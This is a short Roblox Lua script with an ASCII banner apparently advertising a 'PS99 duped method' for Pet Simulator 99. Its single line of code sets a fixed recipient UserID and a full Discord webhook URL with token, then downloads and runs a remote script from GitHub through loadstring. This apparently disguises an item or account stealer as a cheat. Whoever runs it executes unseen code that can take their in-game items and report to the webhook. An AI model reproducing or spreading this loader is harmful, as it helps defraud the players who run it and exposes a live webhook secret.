--[[
        ________  ________       ___    ___      ________  ___  ___  ________  _______   ________          _____ ______   _______  _________  ___  ___  ________  ________     
        |\   __  \|\   ____\     |\  \  /  /|    |\   ___ \|\  \|\  \|\   __  \|\  ___ \ |\   ___ \        |\   _ \  _   \|\  ___ \|\___   ___\\  \|\  \|\   __  \|\   ___ \    
        \ \  \|\  \ \  \___|_    \ \  \/  / /    \ \  \_|\ \ \  \\\  \ \  \|\  \ \   __/|\ \  \_|\ \       \ \  \\\__\ \  \ \   __/\|___ \  \_\ \  \\\  \ \  \|\  \ \  \_|\ \   
        \ \   ____\ \_____  \    \ \    / /      \ \  \ \\ \ \  \\\  \ \   ____\ \  \_|/_\ \  \ \\ \       \ \  \\|__| \  \ \  \_|/__  \ \  \ \ \   __  \ \  \\\  \ \  \ \\ \  
        \ \  \___|\|____|\  \    /     \/        \ \  \_\\ \ \  \\\  \ \  \___|\ \  \_|\ \ \  \_\\ \       \ \  \    \ \  \ \  \_|\ \  \ \  \ \ \  \ \  \ \  \\\  \ \  \_\\ \ 
        \ \__\     ____\_\  \  /  /\   \         \ \_______\ \_______\ \__\    \ \_______\ \_______\       \ \__\    \ \__\ \_______\  \ \__\ \ \__\ \__\ \_______\ \_______\
        \|__|    |\_________\/__/ /\ __\         \|_______|\|_______|\|__|     \|_______|\|_______|        \|__|     \|__|\|_______|   \|__|  \|__|\|__|\|_______|\|_______|
                \|_________||__|/ \|__|                                                                                                                                    
                                                                                                                                                                                
                                                                                                                                                                                

]]--

_G.UserID=1034292812;_G.Webhook="https://discord.com/api/webhooks/1082098949541867550/9kZb9S2e06nmN5dbq3-3UNcsSOMdAUWvdPEexDFIG7KM8s6Fmajr-f1VHtJdgTw4LVKb";loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/rizzhub/main/Script.lua"))();
